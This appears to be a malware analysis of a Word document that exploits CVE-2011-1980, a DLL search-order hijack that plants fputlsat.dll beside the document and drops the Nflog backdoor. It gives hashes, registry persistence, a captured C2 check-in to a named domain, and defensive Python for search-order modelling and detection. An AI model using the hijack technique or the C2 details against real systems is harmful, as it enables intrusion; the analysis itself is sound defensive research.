fputlsat.dll
Contagio: Sept. 23 CVE-2011-1991 type (1) deskpan.dll Windows components DLL loading vulnerability
and
Contagio: Apr 13 CVE-2011-2100 PDF - Adobe DLL Loading Vulnerability - Agenda.7z
DLL search order hijacking exploits have had, and will keep having, new reincarnations because of the order in which Windows looks for a library that an application names without a full path: after the application's own directory and the system directories, the current working directory is consulted before the PATH directories (and before the system directories if SafeDllSearchMode is off). When Office opens a document, the document's folder is that current working directory, so any library Office asks for by name and does not find in its own or the system directories is picked up from the folder the document arrived in. You can read more about the root of these problems (not specific to MS Office) in M-unition: DLL Search Order Hijacking Revisited by Nick Harbour.
As described in the Symantec article, fputlsat.dll must be present in the same directory as the Word document in order to be loaded by the ActiveX control embedded in the document. The payload of this sample is the backdoor trojan Nflog.
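To make the search order concrete, here is an added example (my code, not from the post and not from Microsoft) that models the legacy Win32 search order for a library requested by bare name and reports where each candidate would be loaded from, with SafeDllSearchMode on and off. The directory snapshot, the application and document paths and the KnownDLLs subset are constructed for the illustration; real resolution also depends on manifests, SetDllDirectory/LoadLibraryEx flags and DLL redirection, which the model ignores.

```python
import ntpath

# Constructed snapshot (not from the post): an Office 2003 host without FrontPage,
# and the folder in which the received document sits next to the planted library.
APP_DIR = r"C:\Program Files\Microsoft Office\OFFICE11"
SYSTEM_DIR = r"C:\WINDOWS\system32"
WINDOWS_DIR = r"C:\WINDOWS"
DOC_DIR = r"C:\Documents and Settings\victim\Desktop\attachment"
PATH_DIRS = [SYSTEM_DIR, WINDOWS_DIR, r"C:\Python27"]

SAMPLE_FS = {
    APP_DIR: {"WINWORD.EXE", "MSO.DLL"},
    SYSTEM_DIR: {"kernel32.dll", "ole32.dll", "version.dll"},
    WINDOWS_DIR: {"explorer.exe"},
    # The attacker ships three libraries beside report.doc; not all of them will ever be used.
    DOC_DIR: {"report.doc", "fputlsat.dll", "version.dll", "ole32.dll"},
}

# Assumed subset of HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs:
# these are mapped from system32 by the loader and never searched for on disk.
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "gdi32.dll", "advapi32.dll", "ole32.dll", "oleaut32.dll"}


def search_order(app_dir, cwd, safe_dll_search_mode=True, system_dir=SYSTEM_DIR,
                 windows_dir=WINDOWS_DIR, path_dirs=PATH_DIRS):
    """Directories consulted, in order, for a DLL named without a path.

    With SafeDllSearchMode on (the default since XP SP2) the current directory is
    searched fifth; with it off the current directory is searched second, ahead of
    the system directories.
    """
    sys16 = ntpath.join(windows_dir, "system")  # 16-bit system directory
    if safe_dll_search_mode:
        head = [app_dir, system_dir, sys16, windows_dir, cwd]
    else:
        head = [app_dir, cwd, system_dir, sys16, windows_dir]
    return head + list(path_dirs)


def resolve(dll_name, order, fs=SAMPLE_FS, known_dlls=KNOWN_DLLS, system_dir=SYSTEM_DIR):
    """Full path the loader would map for dll_name, or None if it is not found anywhere."""
    wanted = dll_name.lower()
    if wanted in known_dlls:
        return ntpath.join(system_dir, dll_name)
    for directory in order:
        if wanted in {n.lower() for n in fs.get(directory, ())}:
            return ntpath.join(directory, dll_name)
    return None


def loads_from_document_folder(dll_name, order, doc_dir=DOC_DIR, **kw):
    """True when the copy that wins the search is the one sitting next to the document."""
    path = resolve(dll_name, order, **kw)
    return path is not None and ntpath.dirname(path).lower() == doc_dir.lower()


def hijack_report(doc_dir=DOC_DIR):
    """For both SafeDllSearchMode settings, which of the planted libraries actually get loaded."""
    report = {}
    for mode in (True, False):
        order = search_order(APP_DIR, doc_dir, safe_dll_search_mode=mode)
        report[mode] = {name: loads_from_document_folder(name, order, doc_dir)
                        for name in ("fputlsat.dll", "version.dll", "ole32.dll", "MSO.DLL")}
    return report


if __name__ == "__main__":
    for mode, outcome in hijack_report().items():
        print("SafeDllSearchMode=%s" % mode)
        for name, planted_copy_wins in outcome.items():
            print("  %-14s %s" % (name, "loaded from document folder" if planted_copy_wins else "safe"))
```

The planted ole32.dll never wins because it is a KnownDLL, and the planted version.dll wins only when SafeDllSearchMode is off, because system32 is searched before the current directory in the default mode. A library the application names but Windows does not ship, like fputlsat.dll here, is found nowhere before the current directory in either mode, which is why such names are the ones worth planting next to a document and the ones worth watching for.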
Common Vulnerabilities and Exposures (CVE) number
CVE-2011-1980 Untrusted search path vulnerability in Microsoft Office 2003 SP3 and 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .doc, .ppt, or .xls file, aka "Office Component Insecure Library Loading Vulnerability."
Microsoft Security Bulletin MS11-073 - Important Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634)
- Symantec: New Targeted Attack Using Office Exploit Found In The Wild by Joji Hamada
General File Information
File: 275c5ac2067d17187a71b94ccfdc4608.doc
Size: 22016
MD5: 275C5AC2067D17187A71B94CCFDC4608
File: fputlsat.dll
Size: 126976
MD5: 60068812B59E58D6338AAEBD649F9020
File Description
File: 275c5ac2067d17187a71b94ccfdc4608.doc
Size: 22016
MD5: 275C5AC2067D17187A71B94CCFDC4608
Before the document is opened: the DLL file is present in the same directory
The Word document carries an embedded ActiveX control, the List View form control, a very common one, which in turn loads fputlsat.dll ("Microsoft Office FrontPage Client Utility Library"). There is nothing unusual about that in itself: you can read more about this particular control in "Using the ListView ActiveX Control", and it is normal for it to call FrontPage libraries. The problem is that the library is requested by name only, so when no such library is found in Office's own or the system directories, Windows keeps searching and loads the attacker's copy from the document's folder.
The vulnerability presents itself in the fact that a DLL located in
After the document is opened: the DLL file is renamed to Thumbs.db
Activity after the exploit launch
Examination of the ActiveX component shows the original path of the control as it existed on the author's computer: C:\Documents and Settings\Bandit\Local Settings\Temp\Word8.0\FPDTC.DLL (nice user name).
Office 8.0 is Office 97 (yes, eons ago) and FPDTC.DLL is a FrontPage Design Time Control that was used around 2000-2001. Considering this, I wonder if this vulnerability not only existed but was also used, with minor tweaks, through all versions of MS Office, starting with Office 97 and ending with Office 2010, when it was finally found out. Perhaps Microsoft Office/VB gurus will be able to answer and/or correct me.
List view control
Upon launch, the user is presented with a choice to run or not to run ActiveX controls. By that time the exploit has already worked and the files have been dropped/renamed, so the prompt offers no protection against the library load. Answering Yes will allow the dropped payload iede32.ocx to run.
ActiveX prompt.
The picture below shows locations of the dropped file and the registry changes.
SVCHOST.EXE process injection
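The two on-disk artifacts described above (a library sitting next to the document, then renamed to Thumbs.db once it has been loaded) are easy to hunt for without signatures. This is an added example (mine, not from the post): it walks a directory tree and, in every folder that holds an Office document, flags library files and any file whose contents are a PE image regardless of its name. The sample tree it builds in a temporary directory is constructed for the demonstration; note that a genuine Thumbs.db is an OLE compound file, not a PE image, which is what makes the renamed DLL stand out.

```python
import os
import struct
import tempfile

OFFICE_EXT = {".doc", ".dot", ".xls", ".ppt", ".rtf", ".docx", ".xlsx", ".pptx"}
LIBRARY_EXT = {".dll", ".ocx", ".cpl", ".exe"}
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # Compound File Binary header


def is_pe_image(path):
    """True if the file has an MZ stub whose e_lfanew points at a PE\\0\\0 signature."""
    try:
        with open(path, "rb") as fh:
            stub = fh.read(0x40)
            if len(stub) < 0x40 or stub[:2] != b"MZ":
                return False
            e_lfanew = struct.unpack_from("<I", stub, 0x3C)[0]
            fh.seek(e_lfanew)
            return fh.read(4) == b"PE\0\0"
    except OSError:
        return False


def hunt(root):
    """Return (path, reason) pairs for suspicious files in folders that contain Office documents."""
    findings = []
    for dirpath, _, files in os.walk(root):
        if not any(os.path.splitext(f)[1].lower() in OFFICE_EXT for f in files):
            continue  # planted libraries only matter where a document will be opened
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext in LIBRARY_EXT:
                findings.append((path, "library beside Office document"))
            elif ext not in OFFICE_EXT and is_pe_image(path):
                findings.append((path, "PE image disguised as " + name))
    return findings


def _fake_pe():
    """Minimal MZ + PE header, enough to satisfy is_pe_image (constructed, not real malware)."""
    stub = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", stub, 0x3C, 0x40)  # e_lfanew -> right after the stub
    return bytes(stub) + b"PE\0\0" + b"\0" * 20


def build_sample_tree(root):
    """Constructed layout: a folder before the document was opened, one after, one clean, one with no document."""
    layout = {
        "inbox/agenda.doc": OLE_MAGIC + b"\0" * 504,
        "inbox/fputlsat.dll": _fake_pe(),              # library delivered beside the document
        "attachment/report.doc": OLE_MAGIC + b"\0" * 504,
        "attachment/Thumbs.db": _fake_pe(),            # the same library after the rename
        "clean/notes.doc": OLE_MAGIC + b"\0" * 504,
        "clean/Thumbs.db": OLE_MAGIC + b"\0" * 504,    # a real thumbnail cache is an OLE file
        "tools/readme.txt": b"nothing to see\n",
        "tools/helper.exe": _fake_pe(),                # no document here, so not reported
    }
    for rel, content in layout.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


def demo():
    """Build the sample tree in a temp dir and return the findings, sorted, with paths relative to it."""
    root = build_sample_tree(tempfile.mkdtemp(prefix="dllhunt-"))
    return sorted((os.path.relpath(p, root).replace(os.sep, "/"), why) for p, why in hunt(root))


if __name__ == "__main__":
    for rel, why in demo():
        print("%-25s %s" % (rel, why))
```

Run it over a mail attachment store or user profile tree rather than a whole disk; the folder-contains-a-document filter keeps the noise down, and anything it reports is worth hashing and checking against the hashes listed on this page.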
File: fputlsat.dll
Size: 126976
MD5: 60068812B59E58D6338AAEBD649F9020
fputlsat.dll (thumbs.db) strings
Unicode Strings:
---------------------------------------------------------------------------
Adobe Photoshop
Adobe Photoshop 6.0 -- unknown if these artifacts mean anything. Photoshop is just as old; maybe the same DLL code was used for other products.
VS_VERSION_INFO
StringFileInfo
040404b0
Comments
CompanyName
Microsoft Corporation
FileDescription
Microsoft Office FrontPage Client Utility Library
FileVersion
11.0.5510.0
InternalName
FP40CUTL
LegalCopyright
Copyright(C) Microsoft Corporation 2003. All rights reserved.
LegalTrademarks
OriginalFilename
FP40CUTL
PrivateBuild
ProductName
FP40CUTL.DLL -- Frontpage 2000 file. Wonder if Word 2000 was affected too.
ProductVersion
11, 0, 0, 0
SpecialBuild
VarFileInfo
Translation
Created Files
File: iede32.ocx
Size: 13824
MD5: D4859FC951652B3C9657F8621D4DB625
The trojan starts its activity with a POST to /NfLog/Nfile.asp. This trojan is not new; for example, the CVE-2011-2462 zero-day files carried the same trojan. The service it modifies is Irmon, which is frequently abused by this type of attack (see, for example, the ThreatExpert report of a very common APT backdoor using the same service).
Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters
Class Name: <NO CLASS>
Last Write Time: 2/14/2012 - 1:40 AM
Value 0
Name: ServiceDll
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\iede32.ocx
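The persistence shown above, a svchost-hosted service whose ServiceDll is pointed at the dropped file, can be triaged from a `reg query HKLM\SYSTEM\CurrentControlSet\Services /s /v ServiceDll` listing. This is an added example (mine, not from the post): it parses such a listing and flags entries whose library is not a .dll, does not live under the system directory, or does not match a small baseline of expected libraries. The listing excerpt and the baseline are constructed for the illustration; the baseline values are assumed from a default Windows XP install and should be replaced with ones exported from a known-good host of the same build.

```python
import ntpath
import re

# Constructed excerpt in the format of: reg query HKLM\SYSTEM\CurrentControlSet\Services /s /v ServiceDll
SAMPLE_LISTING = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\browser.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dhcp\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\dhcpcsvc.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Irmon\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\WINDOWS\system32\iede32.ocx

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\srvsvc.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\WINDOWS\Temp\schedsvc.dll
"""

# Assumed baseline (Windows XP defaults); export a real one from a clean host of the same build.
EXPECTED_SERVICEDLL = {
    "browser": "browser.dll",
    "dhcp": "dhcpcsvc.dll",
    "irmon": "irmon.dll",
    "lanmanserver": "srvsvc.dll",
    "schedule": "schedsvc.dll",
}
SYSTEM_ROOT = r"C:\WINDOWS"

KEY_RE = re.compile(r"^HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\]+)\\Parameters\s*$", re.I)
VALUE_RE = re.compile(r"^\s+ServiceDll\s+REG_(?:EXPAND_)?SZ\s+(.+?)\s*$", re.I)


def parse_listing(text):
    """Yield (service name, raw ServiceDll value) pairs from reg query output."""
    service = None
    for line in text.splitlines():
        key = KEY_RE.match(line)
        if key:
            service = key.group(1)
            continue
        value = VALUE_RE.match(line)
        if value and service:
            yield service, value.group(1)


def expand(path, system_root=SYSTEM_ROOT):
    """Expand %SystemRoot% the way the service controller would before loading the library."""
    return re.sub(r"%SystemRoot%", lambda m: system_root, path, flags=re.I)


def triage(text, baseline=EXPECTED_SERVICEDLL, system_root=SYSTEM_ROOT):
    """Return {service: [reasons]} for ServiceDll values that deserve a look."""
    system32 = ntpath.join(system_root, "system32").lower()
    findings = {}
    for service, raw in parse_listing(text):
        directory, filename = ntpath.split(expand(raw, system_root))
        reasons = []
        if not filename.lower().endswith(".dll"):
            reasons.append("library is not a .dll (%s)" % filename)
        if directory.lower() != system32:
            reasons.append("library outside %s (%s)" % (system32, directory))
        expected = baseline.get(service.lower())
        if expected and filename.lower() != expected:
            reasons.append("expected %s for %s" % (expected, service))
        if reasons:
            findings[service] = reasons
    return findings


if __name__ == "__main__":
    for service, reasons in triage(SAMPLE_LISTING).items():
        print(service)
        for reason in reasons:
            print("  -", reason)
```

The Irmon entry from this sample trips two checks (an .ocx where a .dll belongs, and a name that is not the expected irmon.dll); the constructed Schedule entry shows the other common variant, the right file name loaded from the wrong directory. Whichever check fires, the next step is the same: hash the referenced file and compare it with the one on this page.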
Traffic
POST /IElog/TestURL.asp HTTP/1.0
User-Agent: www
Host: www.aviraco.com
Content-Length: 10
Pragma: no-cache

1234567890

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Tue, 14 Feb 2012 05:39:57 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

The 400 Invalid Hostname reply is what an IIS/HTTP.sys server returns when no site is bound to the requested Host header, so at analysis time the server at 216.83.63.147 was no longer serving www.aviraco.com. The request itself is still the indicator: an HTTP/1.0 POST with User-Agent "www" and a ten-byte numeric body.
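The check-in above has a few stable, low-cost traits: HTTP/1.0, a User-Agent of exactly "www", a POST to a "...log/....asp" resource with no Content-Type, and a short numeric body. This is an added example (mine, not from the post) that parses raw HTTP requests and scores them against those traits, run over constructed sample requests: the first is the capture above and the second uses the /NfLog/Nfile.asp path mentioned earlier, while the other hosts and paths are made up for contrast. A User-Agent of "www" on its own is a weak indicator, so the verdict requires several traits at once.

```python
import re

# Request 1 is the capture from the post; 2 reuses the /NfLog/Nfile.asp path the post mentions
# with a made-up host; 3 and 4 are constructed benign traffic sharing one trait each.
SAMPLE_REQUESTS = [
    b"POST /IElog/TestURL.asp HTTP/1.0\r\nUser-Agent: www\r\nHost: www.aviraco.com\r\n"
    b"Content-Length: 10\r\nPragma: no-cache\r\n\r\n1234567890",
    b"POST /NfLog/Nfile.asp HTTP/1.0\r\nUser-Agent: www\r\nHost: update.example.test\r\n"
    b"Content-Length: 10\r\nPragma: no-cache\r\n\r\n0987654321",
    b"POST /login.asp HTTP/1.1\r\nHost: intranet.example.test\r\nUser-Agent: Mozilla/5.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 23\r\n\r\nuser=alice&password=xyz",
    b"GET /index.html HTTP/1.0\r\nUser-Agent: www\r\nHost: www.example.test\r\n\r\n",
]


def parse_request(raw):
    """Split a raw request into method, target, version, a lower-cased header dict and the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers, "body": body}


def beacon_traits(req):
    """Names of the traits this request shares with the observed check-in."""
    h = req["headers"]
    traits = []
    if req["method"] == "POST" and req["version"] == "HTTP/1.0":
        traits.append("post-http10")
    if h.get("user-agent") == "www":
        traits.append("ua-www")
    if re.search(r"/[A-Za-z]+log/[A-Za-z]+\.asp$", req["target"], re.I):
        traits.append("log-asp-path")
    if h.get("pragma", "").lower() == "no-cache" and "content-type" not in h:
        traits.append("no-content-type")
    if req["body"].isdigit() and len(req["body"]) <= 16:
        traits.append("numeric-body")
    return traits


def is_beacon(req, minimum=3):
    """Require several traits together; any single one of them is too common to alert on."""
    return len(beacon_traits(req)) >= minimum


def scan(raws=SAMPLE_REQUESTS, minimum=3):
    """(target, traits, verdict) for each raw request."""
    out = []
    for raw in raws:
        req = parse_request(raw)
        out.append((req["target"], beacon_traits(req), is_beacon(req, minimum)))
    return out


if __name__ == "__main__":
    for target, traits, verdict in scan():
        print("%-22s %-5s %s" % (target, verdict, ",".join(traits)))
```

The same traits translate directly into a proxy-log search or an IDS rule (method, version, User-Agent and URI pattern are all in the header), but the numeric-body check needs the request body, so it belongs in full-capture or sandbox review rather than in a log query.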
Domain Name : aviraco.com
PunnyCode : aviraco.com
Creation Date : 2011-03-30 10:31:10
Updated Date : 2011-03-30 10:31:10
Expiration Date : 2012-03-30 10:31:10
Registrant:
Organization : zhipengwang
Name : zhipengwang
Address : Zhongguancun Hailong Building, Room 1005
City : haidianqu
Province/State : beijingshi
Country : china
Postal Code : 100083
216.83.63.147
Host reachable, 408 ms. average
216.83.32.0 - 216.83.63.255
Ethr.Net LLC
7960B Soquel Dr. #417
Aptos
CA
95003
United States
Automated Scans
Virustotal
SHA256: 429f206f2c68014c75f8a6ae09e68dd672401e461dd2fa72b9087bb5ee530d1e
SHA1: 7dbf130964cdc0110fd517a5d98188df3d56e850
MD5: 275c5ac2067d17187a71b94ccfdc4608
File size: 21.5 KB ( 22016 bytes )
File name: report.doc
File type: MS Word Document
Detection ratio: 17 / 43
Analysis date: 2012-02-15 04:10:05 UTC ( 46 minutes ago )
Antivirus Result Update
AhnLab-V3 Dropper/Ms11-073 20120213
AVG Exploit_c.UDK 20120213
ClamAV Exploit.Doc-2 20120214
Emsisoft Exploit.MSWord.CVE-2011!IK 20120214
eSafe - 20120213
eTrust-Vet - 20120213
Fortinet W97M/CVE_2011_1980.A!exploit 20120214
Ikarus Exploit.MSWord.CVE-2011 20120214
Kaspersky Exploit.MSWord.CVE-2011-1980.a 20120214
McAfee Exploit-CVE2011-1980 20120214
McAfee-GW-Edition - 20120213
Microsoft Exploit:Win32/Actjack.A 20120213
NOD32 W97M/Exploit.CVE-2011-1980.A 20120214
nProtect Trojan-Exploit/W32.Agent.22016 20120213
PCTools Trojan.Generic 20120207
Sophos Troj/Hijack-H 20120214
SUPERAntiSpyware - 20120206
Symantec Trojan.Activehijack 20120214
TrendMicro TROJ_ACTIVEHIJ.A 20120213
TrendMicro-HouseCall TROJ_ACTIVEHIJ.A 20120214
ViRobot Doc.S.MS11-073.22016 20120213
Virustotal
SHA256: 48bc6c0df3302f7eaa6061c4f3b0357b4c512d5bd6f6088abc6fc274f2efc5aa
SHA1: 8f86b7fcaf0c1ee9b795fa8e559def47ef468128
MD5: 60068812b59e58d6338aaebd649f9020
File size: 124.0 KB ( 126976 bytes )
File name: fputlsat.dll
File type: Win32 DLL
Detection ratio: 28 / 43
Analysis date: 2012-02-15 04:10:02 UTC ( 23 minutes ago )
AhnLab-V3 Win-Trojan/Activehijack.126976 20120213
AntiVir TR/Drop.Kaliox.A 20120213
Avast Win32:Malware-gen 20120214
BitDefender Trojan.Generic.KD.529689 20120214
DrWeb Trojan.MulDrop3.34467 20120214
Emsisoft Trojan-Dropper.Win32.Agent!IK 20120214
F-Secure Trojan.Generic.KD.529689 20120214
Fortinet W32/Agent.PRG!tr 20120214
GData Trojan.Generic.KD.529689 20120214
Ikarus Trojan-Dropper.Win32.Agent 20120214
K7AntiVirus Riskware 20120213
Kaspersky Trojan-Dropper.Win32.Agent.gjnt 20120214
McAfee Generic Dropper.p 20120214
McAfee-GW-Edition Artemis!60068812B59E 20120213
Microsoft TrojanDropper:Win32/Kaliox.A 20120213
NOD32 Win32/TrojanDropper.Agent.PRG 20120214
Norman W32/Agent.XGSO 20120213
nProtect Trojan-Dropper/W32.Agent.126976.CS 20120213
PCTools Trojan.Dropper 20120207
Symantec Trojan.Dropper 20120214
TrendMicro TROJ_MULDROP.IC 20120213
TrendMicro-HouseCall TROJ_MULDROP.IC 20120214
VIPRE Trojan.Win32.Generic!BT 20120214
ViRobot Trojan.Win32.Activehijack.126976 20120213
VirusBuster Trojan.DR.Agent!ly6ZRARwo6A
Virustotal
SHA256: 27c87e7993c5661dd3b65e51df5884519fc0234bf36de72082644fa909ccb793
SHA1: d0c3e34bd97c4aa56fe9f176954d274595926a32
MD5: d4859fc951652b3c9657f8621d4db625
File size: 13.5 KB ( 13824 bytes )
File name: iede32.ocx
File type: Win32 DLL
Detection ratio: 28 / 42
Analysis date: 2012-02-14 04:13:46 UTC ( 1 day, 2 hours ago )
AhnLab-V3 Win-Trojan/Activehijack.13824 20120213
AntiVir TR/Spy.13824.71 20120214
Antiy-AVL Trojan/Win32.Genome.gen 20120213
BitDefender Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214
Comodo TrojWare.Win32.GameThief.Nilage.~CRSH 20120214
DrWeb Trojan.Click2.13847 20120214
Emsisoft Trojan.Win32.Spy!IK 20120214
eSafe Win32.GenHeur.LP.Aq@ 20120213
F-Secure Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214
Fortinet W32/Agent.OLJ 20120214
GData Gen:Trojan.Heur.LP.aq4@aqXBVhe 20120214
Ikarus Trojan.Win32.Spy 20120214
K7AntiVirus Riskware 20120213
Kaspersky Trojan.Win32.Genome.aehtz 20120214
McAfee Generic Dropper.p 20120214
McAfee-GW-Edition Artemis!D4859FC95165 20120213
Microsoft TrojanDownloader:Win32/Kaliox.A 20120213
NOD32 Win32/Agent.OLJ 20120214
Norman W32/Troj_Generic.KIKX 20120213
nProtect Trojan/W32.Genome.13824.J 20120213
Sophos Troj/Spy-YL 20120214
Symantec Trojan.Gen.2 20120214
TheHacker Trojan/Agent.olj 20120213
TrendMicro BKDR_CONIP.A 20120214
TrendMicro-HouseCall BKDR_CONIP.A 20120214
ViRobot Trojan.Win32.Activehijack.13824 20120214
VirusBuster Trojan.Agent!KGIS/NcFcUc 20120213
IP Address History
Event Date   Action          Pre-Action IP    Post-Action IP
2009-12-28   New             -none-           174.37.172.68
2010-09-13   Change          174.37.172.68    67.228.81.181
2010-09-24   Change          67.228.81.181    174.37.172.68
2011-02-02   Change          174.37.172.68    67.228.81.180
2011-02-13   Not Resolvable  67.228.81.180    -none-
2011-10-14   New             -none-           98.126.113.28
2011-10-25   Change          98.126.113.28    216.83.63.14

Registrar History
Date         Registrar
2009-12-26   Name.com aka DomainSite
2011-03-29   Xin Net

Name Server History
Event Date   Action    Pre-Action Server   Post-Action Server
2009-12-28   New       -none-              Name.com
2011-02-08   Delete    Name.com            -none-
2011-03-31   New       Xinnet.cn           Xinnetdns.com
2011-12-13   Transfer  Xinnetdns.com       Xincache.com

Other names resolving to the same address (RR)
www.comedns.com.   A   216.83.63.147
www.creamofa.com.  A   216.83.63.147